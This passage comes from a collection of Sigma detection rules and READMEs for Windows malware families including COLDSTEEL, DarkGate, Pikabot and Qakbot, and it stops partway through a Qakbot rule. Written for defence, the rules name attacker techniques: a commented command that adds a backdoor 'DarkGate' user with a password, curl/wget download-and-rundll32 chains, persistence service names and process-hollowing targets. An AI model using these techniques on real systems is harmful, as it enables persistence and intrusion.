    "content": "# COLDSTEEL - Windows Remote Access Tool\n\n## Summary\n\nCOLDSTEEL is a Remote Access Tool designed to support interactive desktop functionality and command-line access.\n\nYou can find more information on the threat in the following articles:\n\n- [COLDSTEEL Malware Analysis Report by NCSC](https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf)\n\n## Rules\n\n- [COLDSTEEL Persistence Service Creation](./win_system_malware_coldsteel_persistence_service.yml)\n- [COLDSTEEL RAT Anonymous User Process Execution](./proc_creation_win_malware_coldsteel_anonymous_process.yml)\n- [COLDSTEEL RAT Cleanup Command Execution](./proc_creation_win_malware_coldsteel_cleanup.yml)\n- [COLDSTEEL RAT Service Persistence Execution](./proc_creation_win_malware_coldsteel_service_persistence.yml)\n- [Potential COLDSTEEL Persistence Service DLL Creation](./file_event_win_malware_coldsteel_service_dll_creation.yml)\n- [Potential COLDSTEEL Persistence Service DLL Load](./image_load_malware_coldsteel_persistence_service_dll.yml)\n- [Potential COLDSTEEL RAT File Indicators](./file_event_win_malware_coldsteel_renamed_cmd.yml)\n- [Potential COLDSTEEL RAT Windows User Creation](./registry_set_malware_coldsteel_created_users.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/COLDSTEEL/file_event_win_malware_coldsteel_renamed_cmd.yml",
    "content": "title: Potential COLDSTEEL RAT File Indicators\nid: c708a93f-46b4-4674-a5b8-54aa6219c5fa\nstatus: test\ndescription: Detects the creation of a file named \"dllhost.exe\" in the \"C:\\users\\public\\Documents\\\" directory. Seen being used by the COLDSTEEL RAT in some of its variants.\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-30\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename: 'C:\\users\\public\\Documents\\dllhost.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/COLDSTEEL/file_event_win_malware_coldsteel_service_dll_creation.yml",
    "content": "title: Potential COLDSTEEL Persistence Service DLL Creation\nid: 1fea93a2-1524-4a3c-9828-3aa0c2414e27\nstatus: test\ndescription: Detects the creation of a file in a specific location and with a specific name related to COLDSTEEL RAT\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf\nauthor: X__Junior (Nextron Systems)\ndate: 2023-04-30\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|endswith: '\\AppData\\Roaming\\newdev.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/COLDSTEEL/image_load_malware_coldsteel_persistence_service_dll.yml",
    "content": "title: Potential COLDSTEEL Persistence Service DLL Load\nid: 1d7a57da-02e0-4f7f-92b1-c7b486ccfed5\nstatus: test\ndescription: |\n    Detects a suspicious DLL load by an \"svchost\" process based on location and name that might be related to ColdSteel RAT. This DLL location and name has been seen used by ColdSteel as the service DLL for its persistence mechanism\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-02\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        Image|endswith: '\\svchost.exe'\n        ImageLoaded|endswith: '\\AppData\\Roaming\\newdev.dll'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml",
    "content": "title: COLDSTEEL RAT Anonymous User Process Execution\nid: e01b6eb5-1eb4-4465-a165-85d40d874add\nstatus: test\ndescription: Detects the creation of a process executing as user called \"ANONYMOUS\" seen used by the \"MileStone2016\" variant of COLDSTEEL\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-30\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|contains:\n            - '\\Windows\\System32\\'\n            - '\\AppData\\'\n        User|contains: 'ANONYMOUS'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_cleanup.yml",
    "content": "title: COLDSTEEL RAT Cleanup Command Execution\nid: 88516f06-ebe0-47ad-858e-ae9fd060ddea\nstatus: test\ndescription: Detects the creation of a \"rundll32\" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in \"MileStone2017\" and some \"MileStone2016\" samples\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-30\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\svchost.exe'\n        ParentCommandLine|contains:\n            - ' -k msupdate'\n            - ' -k msupdate2'\n            - ' -k alg'\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains:\n            - 'UpdateDriverForPlugAndPlayDevicesW'\n            - 'ServiceMain'\n            - 'DiUninstallDevice'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml",
    "content": "title: COLDSTEEL RAT Service Persistence Execution\nid: 9f9cd389-cea0-4142-bf1a-a3fd424abedd\nstatus: test\ndescription: Detects the creation of an \"svchost\" process with specific command line flags, that were seen present and used by ColdSteel RAT\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf\nauthor: X__Junior (Nextron Systems)\ndate: 2023-04-30\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\svchost.exe'\n        CommandLine|endswith:\n            - ' -k msupdate'\n            - ' -k msupdate2'\n            - ' -k alg'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml",
    "content": "title: Potential COLDSTEEL RAT Windows User Creation\nid: 95214813-4c7a-4a50-921b-ee5c538e1d16\nstatus: test\ndescription: Detects creation of a new user profile with a specific username, seen being used by some variants of the COLDSTEEL RAT.\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-02\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - detection.emerging-threats\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\S-1-5-21-'\n            - '\\ProfileImagePath'\n        Details|contains:\n            - 'ANONYMOUS'\n            - '_DomainUser_'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/COLDSTEEL/win_system_malware_coldsteel_persistence_service.yml",
    "content": "title: COLDSTEEL Persistence Service Creation\nid: 3ced239c-7285-4b54-99c4-8525b69293f7\nstatus: test\ndescription: Detects the creation of new services potentially related to COLDSTEEL RAT\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-02\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ServiceName:\n            - 'Name'\n            - 'msupdate'\n            - 'msupdate2'\n        ImagePath|contains: '\\Windows\\System32\\svchost.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/DarkGate/README.md",
    "content": "# DarkGate Loader\n\n## Summary\n\nDARKGATE is a Windows-based malware that has capabilities ranging from cryptocurrency mining, file encryption, credential stealing and remote access to victim endpoints. It was first publicly reported in 2018. [1](https://www.kroll.com/en/insights/publications/cyber/microsoft-teams-used-as-initial-access-for-darkgate-malware)\n\nYou can find more information on the threat in the following articles:\n\n- [Microsoft Teams Used as Initial Access for DARKGATE Malware](https://www.kroll.com/en/insights/publications/cyber/microsoft-teams-used-as-initial-access-for-darkgate-malware)\n- [Shining some light on the DarkGate loader](https://github.security.telekom.com/2023/08/darkgate-loader.html)\n\n## Rules\n\n- [DarkGate - Autoit3.EXE File Creation By Uncommon Process](./file_event_win_malware_darkgate_autoit3_binary_creation.yml)\n- [DarkGate - Autoit3.EXE Execution Parameters](./proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml)\n- [DarkGate User Created Via Net.EXE](./proc_creation_win_malware_darkgate_net_user_creation.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/DarkGate/file_event_win_malware_darkgate_autoit3_binary_creation.yml",
    "content": "title: DarkGate - Autoit3.EXE File Creation By Uncommon Process\nid: 1a433e1d-03d2-47a6-8063-ece992cf4e73\nstatus: test\ndescription: |\n    Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe.\n    This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs\n    process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other\n    processes consitute non-standard and suspicious ways to retrieve the Autoit3 executable.\nreferences:\n    - https://github.security.telekom.com/2023/08/darkgate-loader.html\n    - https://www.kroll.com/en/insights/publications/cyber/microsoft-teams-used-as-initial-access-for-darkgate-malware\n    - https://github.com/pr0xylife/DarkGate/tree/main\nauthor: Micah Babinski\ndate: 2023-10-15\ntags:\n    - attack.command-and-control\n    - attack.execution\n    - attack.t1105\n    - attack.t1059\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\Autoit3.exe'\n            - '\\curl.exe'\n            - '\\ExtExport.exe'\n            - '\\KeyScramblerLogon.exe'\n            - '\\wmprph.exe'\n        TargetFilename|endswith: '\\Autoit3.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml",
    "content": "title: DarkGate - Autoit3.EXE Execution Parameters\nid: f8e9aa1c-14f2-4dbd-aa59-b98968ed650d\nstatus: test\ndescription: |\n    Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within\n    the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate\n    command-and-control server.\nreferences:\n    - https://github.security.telekom.com/2023/08/darkgate-loader.html\n    - https://www.kroll.com/en/insights/publications/cyber/microsoft-teams-used-as-initial-access-for-darkgate-malware\n    - https://github.com/pr0xylife/DarkGate/tree/main\nauthor: Micah Babinski\ndate: 2023-10-15\ntags:\n    - attack.execution\n    - attack.t1059\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_proc:\n        - Image|endswith: '\\Autoit3.exe'\n        - OriginalFileName: 'AutoIt3.exe'\n    selection_parent:\n        ParentImage|endswith:\n            - '\\cmd.exe'\n            - '\\KeyScramblerLogon.exe'\n            - '\\msiexec.exe'\n    filter_main_legit_autoit_location:\n        Image|endswith:\n            - ':\\Program Files (x86)\\AutoIt3\\AutoIt3.exe'\n            - ':\\Program Files\\AutoIt3\\AutoIt3.exe'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml",
    "content": "title: DarkGate - User Created Via Net.EXE\nid: bf906d7b-7070-4642-8383-e404cf26eba5\nstatus: test\ndescription: Detects creation of local users via the net.exe command with the name of \"DarkGate\"\nreferences:\n    - Internal Research\nauthor: X__Junior (Nextron Systems)\ndate: 2023-08-27\nmodified: 2023-10-15\ntags:\n    - attack.persistence\n    - attack.t1136.001\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # /c net user /add SafeMode DarkGate0!\n    selection:\n        Image|endswith:\n            - '\\net.exe'\n            - '\\net1.exe'\n        CommandLine|contains|all:\n            - 'user'\n            - 'add'\n            - 'DarkGate'\n            - 'SafeMode'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml",
    "content": "title: Griffon Malware Attack Pattern\nid: bcc6f179-11cd-4111-a9a6-0fab68515cf7\nstatus: test\ndescription: Detects process execution patterns related to Griffon malware as reported by Kaspersky\nreferences:\n    - https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-09\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\local\\temp\\'\n            - '//b /e:jscript'\n            - '.txt'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/GuLoader/proc_creation_win_malware_guloader_execution.yml",
    "content": "title: Injected Browser Process Spawning Rundll32 - GuLoader Activity\nid: 89e1490f-1a3e-452a-bbb8-b68a5f58072f\nstatus: test\ndescription: |\n    Detects the execution of installed GuLoader malware on the host.\n    GuLoader is initiating network connections via the rundll32.exe process that is spawned via a browser parent(injected) process.\nreferences:\n    - Internal Research\nauthor: '@kostastsale'\ndate: 2023-08-07\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\chrome.exe'\n            - '\\firefox.exe'\n            - '\\msedge.exe'\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|endswith: '\\rundll32.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml",
    "content": "title: IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32\nid: 2bd8e100-5b3b-4b6a-bbb5-b129d3ddddc5\nstatus: test\ndescription: Detects RunDLL32.exe executing a single digit DLL named \"1.dll\" with the export function \"DllRegisterServer\". This behaviour was often seen used by malware and especially IcedID\nreferences:\n    - https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\n    - https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-31\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|endswith:\n            - '\\1.dll, DllRegisterServer' # In case of full path exec\n            - ' 1.dll, DllRegisterServer' # In case of direct exec\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Pikabot/net_connection_win_malware_pikabot_rundll32_activity.yml",
    "content": "title: Potential Pikabot C2 Activity\nid: cae6cee6-0244-44d2-84ed-e65f548eb7dc\nstatus: test\ndescription: |\n    Detects the execution of rundll32 that leads to an external network connection.\n    The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries.\nreferences:\n    - https://www.virustotal.com/gui/file/d72af640b71b8e3eca3eba660dd7c7f029ff8852bcacaa379e7b6c57cf4d9b44\n    - https://www.virustotal.com/gui/file/6bb4cdbaef03b732a93559a58173e7f16b29bfb159a1065fae9185000ff23b4b\n    - https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_06.12.2023.txt\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2023-10-27\nmodified: 2024-01-26\ntags:\n    - attack.command-and-control\n    - attack.t1573\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: network_connection\n    definition: 'Requirements: By default the network_connection type event might not contain the ParentImage. Make sure you collect such fields in order to use this rule'\ndetection:\n    selection:\n        ParentImage|endswith: '\\rundll32.exe'\n        Image|endswith:\n            # Note: Only add processes seen used by Pikabot to avoid collision with other strains of malware\n            - '\\SearchFilterHost.exe'\n            - '\\SearchProtocolHost.exe'\n            - '\\sndvol.exe'\n            - '\\wermgr.exe'\n            - '\\wwahost.exe'\n        Protocol: tcp\n        Initiated: 'true'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml",
    "content": "title: Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE\nid: e5144106-8198-4f6e-bfc2-0a551cc8dd94\nstatus: test\ndescription: |\n    Detects the execution of concatenated commands via \"cmd.exe\". Pikabot often executes a combination of multiple commands via the command handler \"cmd /c\" in order to download and execute additional payloads.\n    Commands such as \"curl\", \"wget\" in order to download extra payloads. \"ping\" and \"timeout\" are abused to introduce delays in the command execution and \"Rundll32\" is also used to execute malicious DLL files.\n    In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files.\nreferences:\n    - https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_30.10.2023.txt\n    - https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_22.12.2023.txt\nauthor: Alejandro Houspanossian ('@lekz86')\ndate: 2024-01-02\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.execution\n    - attack.t1059.003\n    - attack.t1105\n    - attack.t1218\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_cmd:\n        CommandLine|contains|all:\n            - 'cmd'\n            - '/c'\n    selection_pipes:\n        CommandLine|contains:\n            - ' & '\n            - ' || '\n    selection_commands_1:\n        CommandLine|contains:\n            - ' curl'\n            - ' wget'\n            - ' timeout '\n            - ' ping '\n    selection_commands_2:\n        CommandLine|contains:\n            - ' rundll32'\n            - ' mkdir '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_discovery.yml",
    "content": "title: Potential Pikabot Discovery Activity\nid: 698d4431-514f-4c82-af4d-cf573872a9f5\nstatus: test\ndescription: |\n    Detects system discovery activity carried out by Pikabot, such as incl. network, user info and domain groups.\n    The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute).\nreferences:\n    - https://www.virustotal.com/gui/file/72f1a5476a845ea02344c9b7edecfe399f64b52409229edaf856fcb9535e3242\n    - https://tria.ge/231023-lpw85she57/behavioral2\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2023-10-27\nmodified: 2024-01-26\ntags:\n    - attack.discovery\n    - attack.t1016\n    - attack.t1049\n    - attack.t1087\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\n    definition: 'Requirements: By default the process_creation type event might not contain the GrandParentImage. Make sure you collect such fields in order to use this rule'\ndetection:\n    selection_parent:\n        - GrandParentImage|endswith: '\\rundll32.exe'\n        - ParentImage|endswith:\n              - '\\SearchFilterHost.exe'\n              - '\\SearchProtocolHost.exe'\n    selection_child:\n        CommandLine:\n            # Note: Only add strings as seen used by Pikabot to avoid collision with other strains of malware\n            - 'ipconfig.exe /all'\n            - 'netstat.exe -aon'\n            - 'whoami.exe /all'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml",
    "content": "title: Potential Pikabot Hollowing Activity\nid: d8937fe7-42d5-4b4d-8178-e089c908f63f\nstatus: test\ndescription: |\n    Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries.\n    The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries\nreferences:\n    - https://www.virustotal.com/gui/file/b6e8910fb9b3bb1fcddefd35ff0ed8624930d30d6977e11808c8330415685a62\n    - https://www.virustotal.com/gui/file/6bb4cdbaef03b732a93559a58173e7f16b29bfb159a1065fae9185000ff23b4b\n    - https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_06.12.2023.txt\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2023-10-27\nmodified: 2024-01-26\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055.012\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith: '\\rundll32.exe'\n        Image|endswith:\n            # Note: Only add processes seen used by Pikabot to avoid collision with other strains of malware\n            - '\\SearchFilterHost.exe'\n            - '\\SearchProtocolHost.exe'\n            - '\\sndvol.exe'\n            - '\\wermgr.exe'\n            - '\\wwahost.exe'\n    filter_main_legit_sndvol:\n        Image|endswith: '\\sndvol.exe'\n        ParentCommandLine|contains: 'mmsys.cpl'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_uncommon_extension.yml",
    "content": "title: Pikabot Fake DLL Extension Execution Via Rundll32.EXE\nid: 1bf0ba65-9a39-42a2-9271-31d31bf2f0bf\nstatus: test\ndescription: |\n    Detects specific process tree behavior linked to \"rundll32\" executions, wherein the associated DLL lacks a common \".dll\" extension, often signaling potential Pikabot activity.\nreferences:\n    - https://github.com/pr0xylife/Pikabot\n    - https://tria.ge/231004-tp8k6sch9t/behavioral2\n    - https://www.virustotal.com/gui/file/56db0c4842a63234ab7fe2dda6eeb63aa7bb68f9a456985b519122f74dea37e2/behavior\n    - https://tria.ge/231212-r1bpgaefar/behavioral2\nauthor: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-01-26\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\wscript.exe'\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains:\n            - ':\\ProgramData\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Installer\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Roaming\\'\n    filter_main_known_extension:\n        - CommandLine|contains:\n              - '.cpl '\n              - '.cpl,'\n              - '.dll '\n              - '.dll,'\n              - '.inf '\n              - '.inf,'\n        - CommandLine|endswith:\n              - '.cpl'\n              - '.cpl\"'\n              - '.dll'\n              - '.dll\"'\n              - '.inf'\n              - '.inf\"'\n              - \".cpl'\"\n              - \".dll'\"\n              - \".inf'\"\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Qakbot/README.md",
    "content": "# Qakbot\n\n## Summary\n\nQBot is a modular information stealer also known as Qakbot, Quakbot, Oakboat or Pinkslipbot.\n\nYou can find more information on the threat in the following articles:\n\n- [Qakbot - malpedia](https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot)\n- [Qakbot- pr0xylife](https://github.com/pr0xylife/Qakbot/)\n- [DOCUMENTS AND RESOURCES RELATED TO THE DISRUPTION OF THE QAKBOT MALWARE AND BOTNET](https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources)\n\n## Rules\n\n- [Qakbot Regsvr32 Calc Pattern](./proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml)\n- [Potential Qakbot Rundll32 Execution](./proc_creation_win_malware_qakbot_rundll32_execution.yml)\n- [Qakbot Rundll32 Exports Execution](./proc_creation_win_malware_qakbot_rundll32_exports.yml)\n- [Qakbot Rundll32 Fake DLL Extension Execution](./proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml)\n- [Qakbot Uninstaller Execution](./proc_creation_win_malware_qakbot_uninstaller_cleanup.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml",
    "content": "title: Qakbot Regsvr32 Calc Pattern\nid: 0033cf83-fb87-446d-9cac-43d63ad4d5a9\nstatus: test\ndescription: Detects a specific command line of \"regsvr32\" where the \"calc\" keyword is used in conjunction with the \"/s\" flag. This behavior is often seen used by Qakbot\nreferences:\n    - https://github.com/pr0xylife/Qakbot/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-26\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '\\regsvr32.exe'\n        CommandLine|contains|windash: ' -s'\n        CommandLine|endswith: ' calc'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml",
    "content": "title: Potential Qakbot Rundll32 Execution\nid: cf879ffb-793a-4753-9a14-bc8f37cc90df\nstatus: test\ndescription: Detects specific process tree behavior of a \"rundll32\" execution often linked with potential Qakbot activity.\nreferences:\n    - https://github.com/pr0xylife/Qakbot/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-05-24\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_paths:\n        ParentImage|endswith:\n            # Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\curl.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains:\n            # Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware\n            - ':\\ProgramData\\'\n            - ':\\Users\\Public\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Roaming\\'\n    selection_extension:\n        CommandLine|contains: '.dll'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml",
    "content": "title: Qakbot Rundll32 Exports Execution\nid: 339ed3d6-5490-46d0-96a7-8abe33078f58\nstatus: test\ndescription: Detects specific process tree behavior of a \"rundll32\" execution with exports linked with Qakbot activity.\nreferences:\n    - https://github.com/pr0xylife/Qakbot/\nauthor: X__Junior (Nextron Systems)\ndate: 2023-05-24\nmodified: 2023-05-30\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_paths:\n        ParentImage|endswith:\n            # Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\curl.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains:\n            # Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware\n            - ':\\ProgramData\\'\n            - ':\\Users\\Public\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Roaming\\'\n    selection_exports:\n        CommandLine|endswith:\n            # Note: Only add additional exports seen used by Qakbot\n            - 'aslr' # https://tria.ge/230524-scgq9add9v/behavioral1#report\n            - 'bind'\n            - 'DrawThemeIcon'\n            - 'GG10'\n            - 'GL70'\n            - 'jhbvygftr'\n            - 'kjhbhkjvydrt'\n            - 'LS88'\n            - 'Motd'\n            - 'N115'\n            - 'next' # 